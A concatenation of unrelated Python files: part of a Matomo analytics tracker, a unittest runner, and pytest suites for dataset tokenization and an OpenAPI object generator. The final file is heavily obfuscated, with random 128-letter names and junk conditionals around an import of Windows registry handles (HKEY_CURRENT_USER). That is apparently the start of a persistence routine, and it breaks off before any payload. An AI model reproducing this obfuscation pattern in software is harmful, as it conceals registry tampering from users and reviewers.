if self.attributionInfo and self.attributionInfo[1]
else ""
)
+ ("&_refts=" + self.attributionInfo[2] if self.attributionInfo and self.attributionInfo[2] else "")
+ (
"&_ref=" + urlencode_plus(self.attributionInfo[3])
if self.attributionInfo and self.attributionInfo[3]
else ""
)
+ ("&country=" + urlencode_plus(self.country) if self.country else "")
+ ("®ion=" + urlencode_plus(self.region) if self.region else "")
+ ("&city=" + urlencode_plus(self.city) if self.city else "")
+ ("&lat=" + urlencode_plus(str(self.lat)) if self.lat else "")
+ ("&long=" + urlencode_plus(str(self.long)) if self.long else "")
+ custom_fields
+ custom_dimensions
+ ("&send_image=0" if not self.sendImageResponse else "")
+ self.DEBUG_APPEND_URL
)
if self.idPageview:
url += (
("&pf_net=" + str(self.networkTime) if self.networkTime else "")
+ ("&pf_srv=" + str(self.serverTime) if self.serverTime else "")
+ ("&pf_tfr=" + str(self.transferTime) if self.transferTime else "")
+ ("&pf_dm1=" + str(self.domProcessingTime) if self.domProcessingTime else "")
+ ("&pf_dm2=" + str(self.domCompletionTime) if self.domCompletionTime else "")
+ ("&pf_onl=" + str(self.onLoadTime) if self.onLoadTime else "")
)
self.clear_performance_timings()
for key in self.ecommerceView:
url += "&" + key + "=" + urlencode_plus(self.ecommerceView[key])
# Reset page level custom variables after this page view
self.ecommerceView = {}
self.pageCustomVar = {}
self.eventCustomVar = {}
self.clear_custom_dimensions()
self.clear_custom_tracking_parameters()
# force new visit only once, user must call again set_force_new_visit()
self.forcedNewVisit = False
return url
def get_cookie_matching_name(self, name):
"""
Returns a first party cookie which name contains name
* @param string name
* @return string String value of cookie, or None if not found
* @ignore
"""
if self.configCookiesDisabled or not self.request.cookie.get_dict():
return None
name = self.get_cookie_name(name)
# Matomo cookie names use dots separators in matomo.js,
# but PHP Replaces + with _ http://www.php.net/manual/en/language.variables.predefined.php#72571
name = name.replace(".", "_")
for cookie_name, cookie_value in self.request.cookie.items():
if strpos(name, cookie_name):
return cookie_value
return None
def get_current_script_name(self):
"""
If current URL is "http://example.org/dir1/dir2/index.php?param1=value1¶m2=value2"
will return "/dir1/dir2/index.php"
* @return string
* @ignore
"""
url = ""
if self.request.get("PATH_INFO"):
url = self.request.get("PATH_INFO")
elif self.request.get("REQUEST_URI"):
url = self.request.get("REQUEST_URI", "").split("?")[0]
if not url:
# Use if-else instead of get with default to correctly handle empty values
if self.request.get("SCRIPT_NAME"):
url = self.request.get("SCRIPT_NAME")
else:
url = "/"
if url and url[0] != "/":
url = "/" + url
return url
def get_current_scheme(self):
"""
If the current URL is 'http://example.org/dir1/dir2/index.php?param1=value1¶m2=value2"
will return 'http'
* @return string 'https' or 'http'
* @ignore
"""
if "HTTPS" in self.request and (
self.request.get("HTTPS") == "on" or self.request.get("HTTPS") is True
):
return "https"
return "http"
def get_current_host(self):
"""
If current URL is "http://example.org/dir1/dir2/index.php?param1=value1¶m2=value2"
will return "http://example.org"
* @return string
* @ignore
"""
return self.request.get("HTTP_HOST", "unknown")
def get_current_query_string(self):
"""
If current URL is "http://example.org/dir1/dir2/index.php?param1=value1¶m2=value2"
will return "?param1=value1¶m2=value2"
* @return string
* @ignore
"""
url = ""
if self.request.get("QUERY_STRING"):
url += "?" + self.request.get("QUERY_STRING")
return url
def get_current_url(self):
"""
Returns the current full URL (scheme, host, path and query string.
* @return string
* @ignore
"""
return "".join(
[
self.get_current_scheme(),
"://",
self.get_current_host(),
self.get_current_script_name(),
self.get_current_query_string(),
]
)
def set_first_party_cookies(self):
"""
Sets the first party cookies as would the matomo.js
All cookies are supported: 'id' and 'ses' and 'ref' and 'cvar' cookies.
* @return self
"""
if self.configCookiesDisabled:
return self
if self.cookieVisitorId:
self.load_visitor_id_cookie()
# Set the 'ref' cookie
attribution_info = self.get_attribution_info()
if attribution_info:
self.set_cookie("ref", attribution_info, self.configReferralCookieTimeout)
# Set the 'ses' cookie
self.set_cookie("ses", "*", self.configSessionCookieTimeout)
# Set the 'id' cookie
cookie_value = (
self.get_visitor_id()
+ "."
+ str(self.createTs)
)
self.set_cookie("id", cookie_value, self.configVisitorCookieTimeout)
# Set the 'cvar' cookie
self.set_cookie(
"cvar", json.dumps(self.visitorCustomVar), self.configSessionCookieTimeout
)
return self
def set_cookie(self, cookie_name, cookie_value, cookie_ttl):
"""
Sets a first party cookie to the client to improve dual JS-PHP tracking.
This replicates the matomo.js tracker algorithms for consistency and better accuracy.
* @param cookie_name
* @param cookie_value
* @param cookie_ttl
* @return self
"""
cookie_expire = self.currentTs + cookie_ttl
self.request.cookie.set(cookie_name, cookie_value, expires=cookie_expire)
return self
def get_cookies(self):
return self.request.cookie
def get_custom_variables_from_cookie(self):
"""
* @return bool|mixed
"""
cookie = self.get_cookie_matching_name("cvar")
if not cookie:
return False
return json.loads(cookie)
def set_outgoing_tracker_cookie(self, name, value=None):
"""
Sets a cookie to be sent to the tracking server.
* @param name
* @param value
"""
if value is None:
del self.outgoingTrackerCookies[name]
else:
self.outgoingTrackerCookies[name] = value
def get_incoming_tracker_cookie(self, name):
"""
Gets a cookie which was set by the tracking server.
* @param name
* @return bool|string
"""
return self.incomingTrackerCookies.get(name, False)
def parse_incoming_cookies(self, headers):
"""
Reads incoming tracking server cookies.
* @param array headers Array with HTTP response headers as values
"""
self.incomingTrackerCookies = {}
if not headers:
header_name = "set-cookie:"
header_name_length = len(header_name)
for header in headers:
if strpos(header.lower(), header_name) != 0:
continue
cookies = header[header_name_length:].strip()
pos_end = strpos(cookies, ";")
if pos_end:
cookies = cookies[0 : 0 + pos_end]
self.incomingTrackerCookies = parse_qs(cookies)
def matomo_get_url_track_page_view(request, id_site, document_title=""):
"""
Helper def to quickly generate the URL to track a page view.
* @param id_site
* @param string document_title
* @return string
"""
tracker = MatomoTracker(request, id_site)
return tracker.get_url_track_page_view(document_title)
def matomo_get_url_track_goal(request, id_site, id_goal, revenue=0.0):
"""
Helper def to quickly generate the URL to track a goal.
* @param id_site
* @param id_goal
* @param float revenue
* @return string
"""
tracker = MatomoTracker(request, id_site)
return tracker.get_url_track_goal(id_goal, revenue)
|
import argparse
import logging
import unittest
from . import arguments
parser = arguments.test_parser()
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.INFO)
else:
logging.basicConfig()
if args.test:
from . import tests
if args.test is not True:
tests = unittest.defaultTestLoader.loadTestsFromName(args.test, tests)
else:
tests = unittest.defaultTestLoader.loadTestsFromModule(tests)
unittest.TextTestRunner(verbosity=args.verbose+1).run(tests)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jan 14 10:23:45 2022
@author: frederikhartmann
"""
# #####################################
# ############# Imports ###############
# #####################################
# Data manipulation
import torch
import os
# Debugging
import pdb
import seaborn as sns
sns.set_style("whitegrid")
import hydra
# Import pytest
import pytest
from src.data.make_dataset import read_data, tokenizer, convert_to_torchdataset
# NB: ENABLE FOR RUNNING SUBSET OF DATA
subset = True
# testing if data is being read correctly
@pytest.mark.skipif(
not (
os.path.exists("data/processed/train_dataset.pt")
or os.path.exists("data/processed/test_dataset.pt")
),
reason="Data files not found",
)
def test_is_tokenized():
# read dataset
X_train, X_test, y_train, y_test = read_data()
# Tokenizer
train_encodings, test_encodings = tokenizer(X_train, X_test)
# Assert types
assert hasattr(
train_encodings, "input_ids"
), "Tokenized train data does not have input_ids attribute"
assert hasattr(
train_encodings, "attention_mask"
), "Tokenized train does not have attention_mask attribute"
assert hasattr(
test_encodings, "input_ids"
), "Tokenized test data does not have input_ids attribute"
assert hasattr(
test_encodings, "attention_mask"
), "Tokenized test does not have attention_mask attribute"
@pytest.mark.skipif(
not (
os.path.exists("data/processed/train_dataset.pt")
or os.path.exists("data/processed/test_dataset.pt")
),
reason="Data files not found",
)
def test_is_converted():
# read dataset
X_train, X_test, y_train, y_test = read_data()
# Tokenizer
train_encodings, test_encodings = tokenizer(X_train, X_test)
# Convert
train_set, test_set = convert_to_torchdataset(train_encodings, test_encodings, y_train, y_test)
# Assert types for all data
for i in range(len(X_train)):
assert (
type(train_set.__getitem__(i)["input_ids"]) == torch.Tensor
), "Train input_ids data not a tensor"
assert (
type(train_set.__getitem__(i)["attention_mask"]) == torch.Tensor
), "Train attention_mask data not a tensor"
assert (
type(train_set.__getitem__(i)["labels"]) == torch.Tensor
), "Train label data not a tensor"
for i in range(len(X_test)):
assert type(test_set.__getitem__(i)['input_ids']) == torch.Tensor, "Test input_ids data not a tensor"
assert type(test_set.__getitem__(i)['attention_mask']) == torch.Tensor, "Test attention_mask data not a tensor"
assert type(test_set.__getitem__(i)['labels']) == torch.Tensor, "Test label data not a tensor"
assert (
type(test_set.__getitem__(i)["input_ids"]) == torch.Tensor
), "Test input_ids data not a tensor"
assert (
type(test_set.__getitem__(i)["attention_mask"]) == torch.Tensor
), "Test attention_mask data not a tensor"
assert (
type(test_set.__getitem__(i)["labels"]) == torch.Tensor
), "Test label data not a tensor"
@pytest.mark.skipif(
not (
os.path.exists("data/processed/train_dataset.pt")
or os.path.exists("data/processed/test_dataset.pt")
),
reason="Data files not found",
)
def test_load_data():
X_train, X_test, y_train, y_test = read_data()
assert X_train is not None, "X_train not loaded"
assert X_test is not None, "X_test not loaded"
assert y_train is not None, "y_train not loaded"
assert y_test is not None, "y_test not loaded"
|
import pytest
from ..openapi_data_generator.OptionalCombinationGenerator import generate_all_possible_objects
from ..openapi_data_generator.ObjectGenerator import ObjectsGenerator
from compare_objects import compare_objects
from openapi_schema_generator import OpenApiSchemaValidator, OpenApiSchemaGenerator
src_path = "test/Examples"
validator_jobs = OpenApiSchemaValidator(f"{src_path}/jobs.json")
jobs_schemas = OpenApiSchemaGenerator(f"{src_path}/jobs.json").build_mapped_schema()
validator_petstore = OpenApiSchemaValidator(f"{src_path}/petstore.json")
petstore_schemas = OpenApiSchemaGenerator(f"{src_path}/petstore.json").build_mapped_schema()
config = {'default_probability': 5, 'nullable_probability': 5, 'array_min_items': 0, 'array_max_items': 5,
'min_str_len': 1, 'max_str_len': 10, 'min_int': -2147483648, 'max_int': 2147483647,
'min_float': 3.4 * pow(10, -38), 'max_float': 3.4 * pow(10, 38)}
# ~~~~~~~~~~~~~~~~~~~~~ TEST NATIVE ~~~~~~~~~~~~~~~~~~~~~~~~~~ #
def test_two_natives_val_compare():
result = generate_all_possible_objects("require", "full")
assert compare_objects(result, ["require", "full"])
def test_native_and_list_val_compare():
result = generate_all_possible_objects("require", ['native', 'full'])
assert compare_objects(result, ["require", ['native', 'full']])
def test_two_list_of_native():
result = generate_all_possible_objects({'native', "require"}, ['native', 'full'])
assert compare_objects(result, [{'native', "require"}, ['native', 'full']])
def test_list_and_longer_list_of_native():
result = generate_all_possible_objects([('native',), "require"], ['native', 'full', 'longer'])
assert compare_objects(result, [[('native',), "require"], ['native', 'full', 'longer']])
def test_list_and_longer_with_diff_list_of_native():
result = generate_all_possible_objects(['native', "require", 'longer'], ['native', 'full'])
assert compare_objects(result, [['native', 'require', 'longer'], ['native', 'full']])
# ~~~~~~~~~~~~~~~~~~~~~ TEST DICT ~~~~~~~~~~~~~~~~~~~~~~~~~~ #
def test_single_case_to_dicts():
result = generate_all_possible_objects({"a": 1}, {"a": 1, "b": 2})
assert compare_objects(result, [{"a": 1}, {"a": 1, "b": 2}])
def test_two_equal_dicts():
result = generate_all_possible_objects({"a": 1}, {"a": 1})
assert compare_objects(result, [{"a": 1}])
def test_two_bigger_equal_dict():
result = generate_all_possible_objects({"a": 1, "b": 2}, {"a": 1, "b": 2})
assert compare_objects(result, [{"a": 1, "b": 2}])
def test_diff_of_two_keys():
result = generate_all_possible_objects({"a": 1}, {"a": 1, "b": 2, "c": 3})
assert compare_objects(result, [{'a': 1}, {'a': 1, 'c': 3}, {'a': 1, 'b': 2}, {'a': 1, 'b': 2, 'c': 3}])
def test_two_keys_equal_value_not_equal():
result = generate_all_possible_objects({"a": 1, "b": 2}, {"a": 1, "b": 3})
assert compare_objects(result, [{'a': 1, 'b': 3}])
# ~~~~~~~~~~~~~~~~~~~~~ TEST DICT WITH DICT INSIDE ~~~~~~~~~~~~~~~~~~~~~~~~~~ #
def test_require_have_nested_key():
result = generate_all_possible_objects({"a": 1, "b": {"a": 1}}, {"a": 1, "b": {"a": 1, "b": 2}})
expected = [{'a': 1, 'b': {'a': 1}}, {'a': 1, 'b': {'a': 1, 'b': 2}}]
assert compare_objects(result, expected)
def test_require_nested_has_key_full_doesnt_have():
result = generate_all_possible_objects({"a": 1, "b": {"a": 1}}, {"a": 1, "b": {"a": 1, "b": 2}})
expected = [{'a': 1, 'b': {'a': 1}}, {'a': 1, 'b': {'a': 1, 'b': 2}}]
assert compare_objects(result, expected)
def test_require_does_not_have_nested_key():
result = generate_all_possible_objects({"a": 1}, {"a": 1, "b": {"a": 1, "b": 2}})
expected = [{'a': 1}, {'a': 1, 'b': {'b': 2}}, {'a': 1, 'b': {'a': 1}}, {'a': 1, 'b': {'a': 1, 'b': 2}}]
assert compare_objects(result, expected)
def test_very_nested_dict():
result = generate_all_possible_objects({"a": {"b": {"c": {"d": 1}}}}, {"a": {"b": {"c": {"d": 1, "e": 2, "f": 3}}}})
expected = [{'a': {'b': {'c': {'d': 1}}}},
{'a': {'b': {'c': {'d': 1, 'f': 3}}}},
{'a': {'b': {'c': {'d': 1, 'e': 2}}}},
{'a': {'b': {'c': {'d': 1, 'e': 2, 'f': 3}}}}]
assert compare_objects(result, expected)
# ~~~~~~~~~~~~~~~~~~~~~ TEST DICT WITH LIST INSIDE ~~~~~~~~~~~~~~~~~~~~~~~~~~ #
def test_require_have_nested_list():
result = generate_all_possible_objects({"a": 1, "b": [{"a": 1}]}, {"a": 1, "b": [{"a": 1, "b": 2}]})
expected = [{'a': 1, 'b': [{'a': 1}]}, {'a': 1, 'b': [{'a': 1, 'b': 2}]}]
assert compare_objects(result, expected)
def test_list_have_not_exist_object_at_require():
result = generate_all_possible_objects({"a": 1, "b": [{"a": 1}]}, {"a": 1, "b": [{"a": 1}, {"b": 2, 'c': 3}]})
expected = [{'a': 1, 'b': [{'a': 1}]}, {'a': 1, 'b': [{'a': 1}, {'b': 2}]}, {'a': 1, 'b': [{'a': 1}, {'c': 3}]},
{'a': 1, 'b': [{'a': 1}, {'b': 2, 'c': 3}]}]
assert compare_objects(result, expected)
def test_require_have_nested_list_with_bigger_object():
result = generate_all_possible_objects({"a": 1, "b": [{"a": 1}]}, {"a": 1, "b": [{"a": 1, "b": 2, "c": 4}]})
expected = [{'a': 1, 'b': [{'a': 1}]}, {'a': 1, 'b': [{'a': 1, 'b': 2}]}, {'a': 1, 'b': [{'a': 1, 'c': 4}]},
{'a': 1, 'b': [{'a': 1, 'b': 2, 'c': 4}]}]
assert compare_objects(result, expected)
def test_require_have_nested_list_and_dict():
result = generate_all_possible_objects({"a": 1, "b": [{"a": 1}]}, {"a": 1, "b": [{"a": 1, "b": 2}], "c": {"e": 1}})
expected = [{'a': 1, 'b': [{'a': 1}]}, {'a': 1, 'b': [{'a': 1, 'b': 2}], 'c': {}},
{'a': 1, 'b': [{'a': 1}], 'c': {'e': 1}},
{'a': 1, 'b': [{'a': 1, 'b': 2}], 'c': {'e': 1}}]
assert compare_objects(result, expected)
def test_nested_dict_with_nested_list():
result = generate_all_possible_objects({"a": 1, "n": {"b": [{"a": 1}]}},
{"a": 1, "n": {"b": [{"a": 1, "b": 2, "c": 3}]}})
expected = [{'a': 1, 'n': {'b': [{'a': 1}]}}, {'a': 1, 'n': {'b': [{'a': 1, 'b': 2}]}},
{'a': 1, 'n': {'b': [{'a': 1, 'c': 3}]}}, {'a': 1, 'n': {'b': [{'a': 1, 'b': 2, 'c': 3}]}}]
assert compare_objects(result, expected)
def test_nested_list_with_nested_dict_with_nest_list():
result = generate_all_possible_objects({"a": 1, "n": [{"b": [{"a": 1}]}]},
{"a": 1, "n": [{"b": [{"a": 1}, {"b": 2, "c": 3}]}]})
expected = [{'a': 1, 'n': [{'b': [{'a': 1}]}]}, {'a': 1, 'n': [{'b': [{'a': 1}, {'b': 2}]}]},
{'a': 1, 'n': [{'b': [{'a': 1}, {'c': 3}]}]}, {'a': 1, 'n': [{'b': [{'a': 1}, {'b': 2, 'c': 3}]}]}]
assert compare_objects(result, expected)
# ~~~~~~~~~~~~~~~~~~~~~ TEST WITH SCHEMAS ~~~~~~~~~~~~~~~~~~~~~~~~~~ #
# ~~~~~~~~~~~~~~~~~~~~~ JOBS ~~~~~~~~~~~~~~~~~~~~~~~~~~ #
@pytest.mark.parametrize('curr_key', list(jobs_schemas.keys()))
def test_object_build_successfully_with_schema_jobs(curr_key):
if "post" in jobs_schemas[curr_key] and "requestBody" in jobs_schemas[curr_key]['post']:
schema = jobs_schemas[curr_key]['post']['requestBody']
obj = ObjectsGenerator(schema, config)
optional_list = generate_all_possible_objects(obj.required_object, obj.full_object, schema)
for obj in optional_list:
assert validator_jobs.validate_request_schema(curr_key, obj)
# ~~~~~~~~~~~~~~~~~~~~~ PET STORE ~~~~~~~~~~~~~~~~~~~~~~~~~~ #
@pytest.mark.parametrize('curr_key', list(petstore_schemas.keys()))
def test_object_build_successfully_with_schema_petstore(curr_key):
if "post" in petstore_schemas[curr_key] and "requestBody" in petstore_schemas[curr_key]['post']:
schema = petstore_schemas[curr_key]['post']['requestBody']
obj = ObjectsGenerator(schema, config)
optional_list = generate_all_possible_objects(obj.required_object, obj.full_object, schema)
for obj in optional_list:
assert validator_petstore.validate_request_schema(curr_key, obj)
|
# -*- coding: utf-8 -*-
import sys
yVvnDsmDHFJwtkzTXrdPQxkddnKDxtdeyzGKftNynOBsbgmefQcpyMNEkJSiTvyFhdMOkDJqLKVqlQDQvtxHdEYtwpeYKKdhrkXdqeTQJsqLafHvcGgPyhJUWsHyxfoI = 'dCjAzhVjYAMNLNAYdScOtNXXEAuhZgtgPBRZliyRCZlnAYDPQVCrRyKddQIvYCFYDtjeMGUtzIOGLWIGddKIwOmcTdzLuutsazCRJplsOXAmOUzzpUsSTQCCmCJFtKIb'
lbFNowPVchqhHrFMyyHnRmIhTvEUOxFJHPDRCThIrLiboQnBWakuAxDUSSTQNnsQOikSXDVVdkzAjNxeLBvlxjAcRyNRrzOEGmPWGQdisqwUYrdANgUHhyzusUwCcrVB = 'MRffWneODwzJdzwsDIIBJBmoLItpUXyEWgfvTPLXShwYCxqeSItClDkRbnNBmsQzlEsqnmayIxDzZaVnFnDkUGDZlMKzQWtooGOEJSWDMqVCEGwRaSeDVlfQPBPKTtaL'
if yVvnDsmDHFJwtkzTXrdPQxkddnKDxtdeyzGKftNynOBsbgmefQcpyMNEkJSiTvyFhdMOkDJqLKVqlQDQvtxHdEYtwpeYKKdhrkXdqeTQJsqLafHvcGgPyhJUWsHyxfoI != lbFNowPVchqhHrFMyyHnRmIhTvEUOxFJHPDRCThIrLiboQnBWakuAxDUSSTQNnsQOikSXDVVdkzAjNxeLBvlxjAcRyNRrzOEGmPWGQdisqwUYrdANgUHhyzusUwCcrVB:
QxlgDtJCSqanvfWdfGtHuwoFthZAvPxJDXrQwGlmEfKDamSPAfteulsJSubUphHfmZPtkYxCsYnAhmdtVMLTOOHnBSXhtOQasamuSObOfHNszTsouCgRTpPIpmNzxRJU = 'bYNVfiVVWWQAIjHkvqFqpZrtVNDalUgWkNJIMNcRapjEtHzCvkxHNHZIylGPAwUaAfaEdlXJcRFsvetwcEdVEWLOQexmfXIIFzwwxAYtFcNZfmdJCdydCwDzrnjPGbaH'
WvZbtlcnCCxTAyDWoQeOuREsqjEGuxRXtrwtNfbnSKAEcUIPfPHvFbtPNVlNYMFJoSyKSOMwFePwRUYemEkpPJToDmjEXuDCHjOrHRwqyaLzMEUMQaKySsHpvtmYFnrf = 'puJJacQRVjnvlYZCAQbxQbcOtIBhCHMZDEAqMCVCckhOMIGTAmGzdUIWhbLlZOUXfgXZrilIoiIPkXTNuOmzUVuiOnaOSzElUCnGMYeAMmIhvZjpCwQMPtfYVecrmiNA'
WvZbtlcnCCxTAyDWoQeOuREsqjEGuxRXtrwtNfbnSKAEcUIPfPHvFbtPNVlNYMFJoSyKSOMwFePwRUYemEkpPJToDmjEXuDCHjOrHRwqyaLzMEUMQaKySsHpvtmYFnrf = QxlgDtJCSqanvfWdfGtHuwoFthZAvPxJDXrQwGlmEfKDamSPAfteulsJSubUphHfmZPtkYxCsYnAhmdtVMLTOOHnBSXhtOQasamuSObOfHNszTsouCgRTpPIpmNzxRJU
def RxcRLAtmXlEHutqjsTqPDnbkoGVfDtXIqoCNheDOiobDwKjpnzKTxqnKEKMbaLOReulMrzvPDceQQiZeQjYNKdJhiFFsHWqWxIWcCFIvJkBzsCEEYJFqKIipJAIonbjW():
import _winreg
xDIVsoKzZgUihYxYwayOVCmaApXopMYvMmtgwwacXRSTYNzBmUnEbsaQBaBhalzfEjQrmMYPUANolWYNpLrcJYgtPNYjOBPpaDyZHDsKymmoXACUdydckLYHAkBTRFvO = 'ulAXLWHwCqRGAoLjUmnTYHcNApdasHgzBrFRLAeCqDhLFzsYbMridwgdaQrceRhGDAWsPYYzqMuRUmkdEwAPYouRTHCGkHZbtmaajzORLhGcTmqRiUVEsrHuvMANduXh'
UcQCmnWFcrAMLLnFqRPdXiuFETFDIMKOxZWDRVrMShnXmvpYHdmjTiXQpjYHejViUNcRHJZMhQoeboNNvDOxGSuIAqRYzgbeNWrluIZzzhMTqFyVLFydjovAflYHDzEz = 'EESDsFWjrkiydkyBvkuICPIdrRQgSKCeDDUfSKGSSNTiwAhWYMQIoIjcBpPPMgwxIZNuHaTEyXETHssltIJHzhfilhNxzeduTXNuWAlTYvaBYdphegpgIuNcAvWkDEes'
dxPnTpwLobCVVmwUnuTzPtMDqwhqCtOmlaMLoSmPdvzDoEIUWIXGMogSgqRNToNwtDphNASDJTYxxPtWxOVfpUnwkrPiYihANEKXVloFyGKdnuWCDmPYCDoLWVQSmYAm = 'fUKyGTpNgnobAWUHPgnbjXZWXsAtJAwCvnsDbSNfLANPXRGFJZBzIHVffmYXUYsYmyDcizJiIgiUmbLpMmqfpiBbcWBNbVqrpadBzURySpMHRwCnfhKFZrTkZtvdlXEU'
JHTHNixZDdWPHrnIiwHJOfarElzWAYhcJMiEZiZoPDLHsBoKGILRkLDXMADgZhHLPsqpjINnmXeSPsCYTXBmtHfkNgGMWQPmWrdUwwurNwwgjzBkssFpuCBwUpGehWsR = 'UbAzGcyWMtMhNuYfKoqNRTjwzfjXvJaclQzsMVesSLLyzZWTJVejafWlxDbpCviHsAvPQXcbYuCDKrduTjhisIIifAYeMonsVGcsvSzQCWVOjHgpdzMmnmmbFofQLvDn'
aUzFbtDYsYAEXeqkvIJrRKabUlsMToupgqahvIYDjlcYyTsETSfjoAMsQmtNcEdeNgnlYdUZUzRswfoQOuMtETMgRDBNrUZbdTHpsUvJGArnwLqUwzgJVIFVTkuboRru = 'EamFkaMwyhOQKFbqDnJSJfjfERyZndbRKCigeeykUJHAOzKWodjccccxiSECllsTxKklyfgOfnJWOYguuGilcNVrDMLWDoBzhRDFpZguXXOITGWoGtLJlocfVLpcRSaG'
if xDIVsoKzZgUihYxYwayOVCmaApXopMYvMmtgwwacXRSTYNzBmUnEbsaQBaBhalzfEjQrmMYPUANolWYNpLrcJYgtPNYjOBPpaDyZHDsKymmoXACUdydckLYHAkBTRFvO in UcQCmnWFcrAMLLnFqRPdXiuFETFDIMKOxZWDRVrMShnXmvpYHdmjTiXQpjYHejViUNcRHJZMhQoeboNNvDOxGSuIAqRYzgbeNWrluIZzzhMTqFyVLFydjovAflYHDzEz:
xDIVsoKzZgUihYxYwayOVCmaApXopMYvMmtgwwacXRSTYNzBmUnEbsaQBaBhalzfEjQrmMYPUANolWYNpLrcJYgtPNYjOBPpaDyZHDsKymmoXACUdydckLYHAkBTRFvO = aUzFbtDYsYAEXeqkvIJrRKabUlsMToupgqahvIYDjlcYyTsETSfjoAMsQmtNcEdeNgnlYdUZUzRswfoQOuMtETMgRDBNrUZbdTHpsUvJGArnwLqUwzgJVIFVTkuboRru
if UcQCmnWFcrAMLLnFqRPdXiuFETFDIMKOxZWDRVrMShnXmvpYHdmjTiXQpjYHejViUNcRHJZMhQoeboNNvDOxGSuIAqRYzgbeNWrluIZzzhMTqFyVLFydjovAflYHDzEz in dxPnTpwLobCVVmwUnuTzPtMDqwhqCtOmlaMLoSmPdvzDoEIUWIXGMogSgqRNToNwtDphNASDJTYxxPtWxOVfpUnwkrPiYihANEKXVloFyGKdnuWCDmPYCDoLWVQSmYAm:
UcQCmnWFcrAMLLnFqRPdXiuFETFDIMKOxZWDRVrMShnXmvpYHdmjTiXQpjYHejViUNcRHJZMhQoeboNNvDOxGSuIAqRYzgbeNWrluIZzzhMTqFyVLFydjovAflYHDzEz = JHTHNixZDdWPHrnIiwHJOfarElzWAYhcJMiEZiZoPDLHsBoKGILRkLDXMADgZhHLPsqpjINnmXeSPsCYTXBmtHfkNgGMWQPmWrdUwwurNwwgjzBkssFpuCBwUpGehWsR
elif UcQCmnWFcrAMLLnFqRPdXiuFETFDIMKOxZWDRVrMShnXmvpYHdmjTiXQpjYHejViUNcRHJZMhQoeboNNvDOxGSuIAqRYzgbeNWrluIZzzhMTqFyVLFydjovAflYHDzEz in xDIVsoKzZgUihYxYwayOVCmaApXopMYvMmtgwwacXRSTYNzBmUnEbsaQBaBhalzfEjQrmMYPUANolWYNpLrcJYgtPNYjOBPpaDyZHDsKymmoXACUdydckLYHAkBTRFvO:
dxPnTpwLobCVVmwUnuTzPtMDqwhqCtOmlaMLoSmPdvzDoEIUWIXGMogSgqRNToNwtDphNASDJTYxxPtWxOVfpUnwkrPiYihANEKXVloFyGKdnuWCDmPYCDoLWVQSmYAm = UcQCmnWFcrAMLLnFqRPdXiuFETFDIMKOxZWDRVrMShnXmvpYHdmjTiXQpjYHejViUNcRHJZMhQoeboNNvDOxGSuIAqRYzgbeNWrluIZzzhMTqFyVLFydjovAflYHDzEz
if dxPnTpwLobCVVmwUnuTzPtMDqwhqCtOmlaMLoSmPdvzDoEIUWIXGMogSgqRNToNwtDphNASDJTYxxPtWxOVfpUnwkrPiYihANEKXVloFyGKdnuWCDmPYCDoLWVQSmYAm in UcQCmnWFcrAMLLnFqRPdXiuFETFDIMKOxZWDRVrMShnXmvpYHdmjTiXQpjYHejViUNcRHJZMhQoeboNNvDOxGSuIAqRYzgbeNWrluIZzzhMTqFyVLFydjovAflYHDzEz:
UcQCmnWFcrAMLLnFqRPdXiuFETFDIMKOxZWDRVrMShnXmvpYHdmjTiXQpjYHejViUNcRHJZMhQoeboNNvDOxGSuIAqRYzgbeNWrluIZzzhMTqFyVLFydjovAflYHDzEz = aUzFbtDYsYAEXeqkvIJrRKabUlsMToupgqahvIYDjlcYyTsETSfjoAMsQmtNcEdeNgnlYdUZUzRswfoQOuMtETMgRDBNrUZbdTHpsUvJGArnwLqUwzgJVIFVTkuboRru
from _winreg import HKEY_CURRENT_USER as HKCU
QQMWajTKLPfDGvZYyskhSxpDEGVARKvBipOsZaSTIFZPzispKfMkDddDdyYKpbpQBucdKoPzjejmvkEPSmlLptUCzGHnOOaWHWNeoiGcmweqHvRgGdNTsFlLYifVJXSh = 'KuTLuknSOyfRphcufHQHoWufUehjjSbpEhuStKIiPkwSLgKVGSnlMFsJkUpQYWeYkgsekfrpdHlkkSqANIGOpADDMfkxeLRPaubbcSokjRhhqnYNpqcdiGntFhylUTIg'
YxwbOJGwnzPtpULLXfCOjivEbjaJXYhpRJlAcyfBiVBbHTPAkKNIsuLBShsEfeZzBARczJpmWvkfbjRiDEcAkzTCcfygswvSWnkYhbXkxfcugvCXoopvSRsjQvCGqpEv = 'HuDVRyXuRYfxlsPjBkGLpvOXzUrwbWTIcrvdVntvUdfbpXcvPGRzlltSmFrDZddOWDUrsqirFlGunAiJugxYYXXcGbMqviAFUuUfBooYnjjGndQsBLPFmDTyULkqEvUq'
dlndwKQxWyZJPjsdqDukUwviwyeyQFNwikGlkqjpOdDXRiNEvdVYJdijpbNnQYNVrdpZdqCfWINEjgKqMTFYifdjlMHrfSNJmPhccOLIKCFFgbiNAiKwokedLlqzPpJl = 'CYrvzPSXXHogVxdArcBXKMQDAEOYmyZlJYohIQbQquMIWdkgqsaqqihrkzfrENBNHCuqFlgTalyYOfOsOilazAWSZCqLLlJWbGfcLGjeOMgSdNKUHMegBQYLNZlbazVT'
QxliQfauwlmhOuSYpAIbBkEZFlfeznzracnBcvkPtnPjyRcihsWfrWTiIEqKwMArosKdwsiOmlOQacQFsMnfLclMLbwmuPcImtulFPZutlcTnqWjHTKEhATDnOjUVwvu = 'OQNgjXTAoSbMIbAzicPJibrGFUpxfIacsZWwZVQwaOCjvcOJEZEUzHXLAKPRQKaunZFqwqChAIyfsxdivvWPEaWCkXJDRKfEVawzRjAsrhTUmWLSpYLGSyWnNdGcVqiN'
NhvUOqUUVggsKMPNmxBNkbudmyxbuRuEngqsoDJGPyUJiCFWRfZXKjjiGGMquMbTUEfwcHIkrmFZOTISyEsiDSagWnhVurTCIfghOfuXJwAacscefuAyuComyCVlXcDo = 'FlLGnCxTpDIEzRrHDqeGtowFQzhLDgPxCwpGSYWTqeHillkAZTQWpRMSPkowJhgaQjZSZerxLrGEZBEDuljvZqPhFJoStcbLGEhAvpWYNtBnQQOZqsHOkFxlyxeEKjCz'
